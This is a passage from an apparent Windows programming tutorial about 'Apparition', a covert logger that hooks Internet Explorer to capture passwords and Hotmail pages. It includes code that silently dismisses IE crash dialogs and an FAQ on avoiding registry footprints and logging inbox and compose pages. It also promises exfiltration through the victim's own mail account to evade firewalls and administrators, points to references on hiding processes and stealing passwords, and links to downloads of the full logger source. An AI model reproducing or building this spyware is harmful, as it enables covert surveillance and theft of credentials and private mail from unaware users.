      //uncheck it
      ::SendMessage(hChild, BM_SETCHECK,
                    BST_UNCHECKED, 0);
    }
    hChild = ::FindWindowEx(hWnd, hChild,
                            _T("Button"), NULL);
    }
  //Find "Don't Send" it is the right-most button OR
  //the first child button, Check this code when you are using
  //other languages than English with Windows
   hChild = ::FindWindowEx(hWnd, NULL,
                           _T("Button"), NULL);
    DWORD btnID = ::GetWindowLong(hChild, GWL_ID);
                  ::SendMessage(hWnd, WM_COMMAND,
                                (WPARAM)MAKELONG((WORD)btnID,
                                 BN_CLICKED),
                                 (LPARAM)hChild);
    return TRUE;
}

Ok, man. We have successfully quenched the “IE crash dialog.” Although it is overkill, we have no choice. Enjoy being logged! This is the end of IE hooking today.

Miscellaneous and FAQ:

Q1. What if I use the onsubmit(of HTMLFormElementEvents) event instead of BeforeNavigate2 (of DWebBrowserEvents2) event to trigger the page reading?

A1. You can do that if you only care about form-based data. Actually, it was my first attempt when making this logger for IE. But there is one catch: usually, your form will NOT exist any more after “submission”, because submitting navigates to another page. So, each time you navigate to a new page, you have to parse the page to see whether a form is there, and remember to release the old form COM pointer in time. That is too complicated, and the main purpose of doing it is to find the password input area on the form; since I now parse the whole page, I will not miss it anyway. Still, if you like this approach, you can make cool code with it. For beginners, I suggest reading the source code of the MFC sample “MFCIE”; it should be reachable in the online MSDN. It dumps the various events from a browser and gives you a start on IE coding.

Q2. I hooked IE to get all mouse clicks and hope that, by doing this, I could get the event “user click submit button”. Is that okay?

A2. First, I do not blame the MS IE developer team; they did a good job shipping a first-class browser to users. But, compared to other parts of Windows, DHTML or MSHTML (I don’t care about the name; it is just a COM object for parsing HTML or whatever) is not only unstable, but also easy to crash due to the unsolvable deficiencies of the script-driven stuff. If you are a fast hand (especially if you have experience with online war games such as Red Alert or StarCraft), you will lose at least one mouse click out of 100 (if not 500) on an IE browser; if your CPU is busy, the rate will almost certainly be higher. So DO NOT LINK a mouse window message (e.g., WM_LBUTTONDOWN) to any DHTML event; use the latter only when you play with DHTML. Refer to “Programming Internet Explorer 5.0” (MS Press, 1999) for details.

Q3. I want to use your program in my Windows 9x/ME!

A3. I have already taken care of this in the code: everywhere you will see only TCHAR- and lstrcpy-like code. Change the preprocessor definitions from “_UNICODE, UNICODE” to “_MBCS”, remove the “wWinMainCRTStartup” entry point from the linker settings of the GUI end, and change all cast code like this:

BSTR bstrNickName;
//some text query
_stprintf(sz, _T("%s\t\r\n"), (LPCTSTR)bstrNickName);
to
BSTR bstrNickName;
//some text query
char* pBuffer;
//WideCharToMultiByte from bstr to char, refer MSDN,
//take care of buffer length!
_stprintf(sz, _T("%s\t\r\n"), (LPCTSTR)pBuffer);

I think you will be good to go after this modification. I have no intention of writing any code for Win9x because it is three years old.

Q4. Why not use BHO?

A4. Oh, just because it is a logger and I do not want to touch that part of the Registry and leave footprints there. BHO does save you from hooking such a long way to get the page, so if you want to decrease your coding time and workload and want to interact with IE pages aboveboard, use BHO.

Q5. I am an eagle-eye COM guru and I found one strange thing: In your code, you call CoInitialize() and CoUninitialize() in your LinkCom function to get an IHTMLDocument2 pointer from the window handle. How could you still use this COM object after CoUninitialize() and even save it in the shared section???

A5. Good question, eagle-eye guys. I do it because I am 100% sure the IE thread has already called CoInitializeEx before my DLL is hooked into it. So, the COM library stays alive there until I release my COM object pointer and eject my DLL. In fact, you need not call them at all in the code.

Q6. Hi, Jeff. I think it is an overkill to intercept all Hotmail pages. If you have gotten the password successfully, why bother logging the inbox page? Besides, your logic will not prevent logging the same page twice when a user moves backward and forward.

A6. I agree with you on the second point only. Yes, when a user moves backward and forward, the same page will be logged twice or more. It is not a hard technical problem; you merely implement a cache of the Hotmail pages and compare against it before saving them. BUT, you have to log the Inbox, Compose, and Mail pages because they may be transient: the user may delete their mail or not save it to the Sent box, and then these pages disappear permanently. In a word, our current IE hooking is an inside-out predator.

Words to Readers

It is a key part of a logger to include this IE hooking functionality and to parse pages properly and efficiently on the fly. In almost all cases, unnecessary information makes up most of a Web page, and dumping the whole page wastes a lot of storage space and bandwidth. Do not get me wrong; if your logger has 1 Gb of network bandwidth available, cloning the whole hard disk and sending out the data is a better idea. Another cool thing is that, in later articles of this series, the logger will run inside the IE instance and communicate over the network using the just-obtained on-line mail account on the fly. Neither the smartest firewall nor the smartest administrator will find it unless they use a sniffer to record all the actual data. Surely, we have to devise even cooler code to stop this… (to be continued).

Partial Reference and Brief Description

  1. Programming Applications for MS Windows, 4th Edition, by Jeffrey Richter, ISBN 1-57231-996-8, Microsoft Press, 1999. Look up its DLL, SEH, and Memory Management part.
  2. Inside DCOM, ASIN: 157231849X or Inside COM+ Base Services, by Guy Eddon and Henry Eddon, ISBN 0-7356-0728-1, 1999 Microsoft Press. Answers your every question on COM/DCOM/COM+ in theory. Cool++.
  3. Professional NT Services, by Kevin Miller, ISBN: B00005Y2AZ, Wrox Press, 1998. Everything related to NT Service: security, DB connection, COM server, etc…
  4. Programming Server-Side Applications for Microsoft Windows 2000, by Jeffrey Richter, Jason D. Clark, ISBN 0-7356-0753-2, Microsoft Press, 1999. A must-have book on backend server programming, plus a serious, terribly good, ready-to-go security code.
  5. Programming Windows Security, by Keith Brown, ISBN: 0201604426, Addison-Wesley Pub Co, 2000. Comprehensive and in-depth talking on Win2k security. Seems not suitable for beginners. I recommend reading book 4 before digging into this one. Another must-have book. http://www.develop.com/books/pws/errata.htm for updating
  6. Programming Microsoft Internet Explorer 5, by Scott Roberts, ISBN 0-7356-0781-8, Microsoft Press, 1999. The first and only book solely dedicated to IE programming as its name—DHTML, IE event handling with VB and VC++, BHO, and so on.
  7. Programming the Microsoft Windows Driver Model, by Walter Oney, ISBN 0-7356-0588-2, 1999. Former “Systems Programming for Windows 95” author, Oney gives a DDK course here. We will use a little DDK later in this series.
  8. Windows NT/2000 Native API Reference, by Gary Nebbett, ISBN: 1578701996, Que, 2000. A function signature list of ddk.h; you do not need it if you are smart enough to guess tons of strange naming conventions in ddk.h. We use it when doing API hooking.
  9. Debugging Applications, by John Robbins, ISBN 0-7356-0886-5, Microsoft Press, 2000. Get more information about exception handling besides the Programming Application for Windows and Programming the Microsoft Windows Driver Model books.
  10. API Hooking Revealed by Ivo Ivanov, 2002 Apr. Excellent milestone article covering hooking. Also, read his other two articles Single interface for enumerating processes and modules under NT and Win9x/2K (or http://www.codeproject.com/system/hooksys.asp) and Detecting Windows NT/2K process execution (or http://www.codeproject.com/threads/procmon.asp) . Hint: Take note on his reference list; it is a gold mine!
  11. Three Ways to Inject Your Code into Another Process (or http://www.codeproject.com/useritems/winspy.asp), by Robert Kuster. 2003 Feb. Excellent milestone article on remote inject
  12. Trapping CtrlAltDel;Hide Application in Task List on Win2000/XP, by Jiang Sheng, 2003 Apr. Shows how to hide a process (task) from the task manager. Although his English is not perfect (as he described in the first sentence), I recommend you at least dl (download) his code and have a try.
  13. “How to Trap CtrlAltDel Key Combination in Windows NT/2000/XP (without using GINA and keyboard driver technology,” by Weiwu Tan (slwqw@163.com), CSDN forum (Simplified Chinese Only) 2002. It may be temporarily here: http://www.csdn.net/develop/Read_Article.asp?Id=15645. Dl it asap. A creative article dealing with prohibiting Ctrl-Alt-Del by intercepting a hotkey on logging on to a desktop. You can read the code anyway even you have no knowledge of Simplified Chinese. (Type GINA in www.csdn.net; it will lead to the hyperlink.)
  14. Disabling Keys in Windows XP with TrapKeys by Paul DiLascia, MSDN Magazine September 2002.
  15. Escape from DLL Hell with Custom Debugging and Instrumentation Tools and Utilities by Christophe Nasarre, MSDN 2002 June. Detection and listing of all running processes and modules is the basis of logger detection, isn’t it? So, read this.
  16. http://www.sysinternals.com. Go there to download a tool called “procexp.exe” that lists all processes on the fly. We will need this tool to scan existing processes later, when we talk about detecting a logger. The site is run by Mark Russinovich, co-author (with David A. Solomon) of the cool book Inside Microsoft Windows 2000, ISBN 0-7356-1021-5, Microsoft Press, 2000.
  17. Note: If your machine is slow or the CPU is busy, do not try to monitor MSN Messenger, because doing so makes the CPU even busier and can make the machine appear to hang for a while.

  18. http://www.dependencywalker.com/. The latest version of our old friend, Dependency Walker (depends.exe); it has been around since 1996. We will check the dependencies of MSN Messenger later in this series.
  19. http://www.users.on.net/johnson/resourcehacker/ Resource Hacker. I have been using this tool for quite a few years, ever since I got tired of coding handlers for every resource type myself. It dumps the rc file and any attached resources (a bitmap, say) to disk. The first time I used “procexp.exe” from www.sysinternals.com, I was curious why it ships as a single EXE. With Resource Hacker, I found that its driver SYS file is embedded inside the EXE. We will use the same approach to bundle our logger later.
  20. How to get current user password (http://nfans.net/article/manu/26.html), by shotgun. You can read the code directly, regardless of the Chinese title.
  21. http://www.geocities.co.jp/SiliconValley-PaloAlto/5333/index.htm (Japanese only). A Japanese developer’s page of system programming samples.
  22. http://www.codebase.nl/index.php/command/viewcode/id/127 Shows how to insert a menu item into MSN Messenger; it should also work with MSN Messenger 6.0. The author’s language is apparently not English but, luckily for us, the code is in English, so have a look at it.
  23. Tools to peek into PE files: YAHU, or Yet Another Header Utility (http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarwbgen/html/msdn_exeform.asp), by Ruediger R. Asche, 1995. All source code is available.

    Figure 3.13: A running IE instance about to be intercepted by “Apparition”

    Figure 3.14: “Apparition” dumping that IE instance’s HTML at run time

    This article is already long enough, but I still have to remind you: do not use this approach if you just want your GUI program to interact with IE. Use a BHO, or check the article http://www.codeguru.com/ieprogram/enumIE.html (and fix its memory leak bug by calling SysFreeString). My approach is suitable only for programs running in the background, so the code is much, much longer than with either of those two alternatives!

    Coming Soon

    Logger Detector More or MSN 6 Hooking…

    Downloads

    Download Apparition Demo Project Source (including EXE, 1.22 Mb)
    Download Apparition Demo Exe File Only (exe/dll Only, MFC4.2 DLL STATIC linked, 256 Kb)

    Download HtmlPeek Demo Source and Exe (code and exe, 219 Kb, MFC42 static link)
